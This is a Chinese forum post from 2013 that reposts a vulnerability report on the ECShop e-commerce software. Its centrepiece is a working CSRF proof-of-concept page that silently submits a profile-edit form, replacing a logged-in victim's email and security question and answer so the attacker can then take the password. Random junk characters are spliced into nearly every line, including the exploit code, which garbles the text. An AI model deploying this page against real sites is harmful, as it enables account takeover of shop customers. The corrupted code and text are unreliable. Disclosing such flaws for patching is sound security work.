找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2052|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
4 @$ Q' T+ {; K* Eecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
7 r% x% H0 V" e3 q
4 I# i$ f& N: p0 e1 }8 D4 @Demo For:http://www.wooyun.org/bug.php?action=view&id=395
. A" o: X4 D" }! i6 [% J( N
  I1 Q! G. b0 `0 c+ `' g详细说明:, D$ p, m# Q$ m1 w
利用csrf和xss可以突破官方所说的“障碍”
2 Z- {( N/ T1 L6 F+ [& _4 c, Y, W4 _xss版本已经有人说明
8 Z$ a- I& K0 A0 W- ~这里给出csrf版本
! L  c5 ?9 ^& \/ W
3 V( p  j5 V2 {! {6 Q( l漏洞证明:
3 I1 J- ~- t9 I. x$ Y% S  a- v<html>! I; {. @( j+ Q5 A0 u& Z6 Z9 o
<body>/ _# f6 v$ K' f  X  E3 E
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">/ x' T: s' P( Z. c) b) Q
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">/ a/ P9 D- a2 Q1 `4 o+ P
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
% |+ A- {" F* j8 [5 W7 p, C2 E<INPUT TYPE="text" NAME="sel_question" value="ecshop">
# x+ E8 n8 ~1 O0 c7 b2 w; e/ m6 h<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
+ H0 F4 G. }1 A( y; n</body>7 x( l! F% ~) s. ]' h
<script>
0 ~+ R9 o$ [8 R; f2 `7 gdocument.forms[0].submit();
: Q+ }+ s# T- b/ t5 B  S/ V" s</script>* o1 v  U- n$ B# ]
</html>( A1 F! k8 F+ g- ^- v' S! T7 \
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
% i7 o2 V2 S3 x
* l2 |( j6 T) ?6 I& n" m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表